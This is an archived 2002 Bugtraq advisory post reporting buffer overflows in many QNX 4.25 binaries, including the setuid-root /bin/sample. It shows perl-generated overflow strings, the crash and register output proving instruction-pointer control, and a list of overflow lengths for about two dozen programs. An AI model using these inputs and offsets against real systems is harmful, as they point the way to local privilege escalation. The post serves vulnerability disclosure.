Bugtraq mailing list archives
madcr: QnX 4.25 - multiples bof in suid/no suid files
From: Egor Egorov <madrats () mail ru>
Date: 12 Jun 2002 12:10:46 -0000
/bin/sample ----------------//------------------------------ # cd /bin # ls -l sample -rwsrwxr-x 1 root root 20639 Jan 19 1996 sample # sample `perl -e 'print "A" x 280'` Profile based upon 2000 samples/second. //1/bin/sample terminated (SIGSEGV) at 0005:00000041 %1 672 Memory fault sample $(perl -e 'print "A" x 280') # wd sample 'perl -e print "A" x 280'` ebp: 41414141 eip: 00000041 # wd sample 'perl -e 'print "A" x 280, "B"'` ebp: 41414141 eip: 00004241 ----------------//------------------------------ /bin/ex ----------------//------------------------------ # wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'` ebp: 00000041 eip: 646f6f67 - doog ----------------//------------------------------ file bytes for bof /bin/du - 558 /bin/find - 799 /bin/lex - 1673 /bin/mkdir - 517 /bin/rm - 351 /bin/serserv - 224 /bin/tcpserv - 146 /bin/termdef - 729 /bin/time - 2489 /bin/unzip - 299 /bin/use - 1964 /bin/wcc - 138 /bin/wcc386 - 137 /bin/wd - /bin/wdisasm - 135 /bin/which - 304 /bin/wlib - 256 /bin/wlink - 10244 /bin/wpp - 256 /bin/wpp386 - 256 /bin/wprof - 141 /bin/write - 157 /bin/wstrip - 817
Current thread:
- madcr: QnX 4.25 - multiples bof in suid/no suid files Egor Egorov (Jun 12)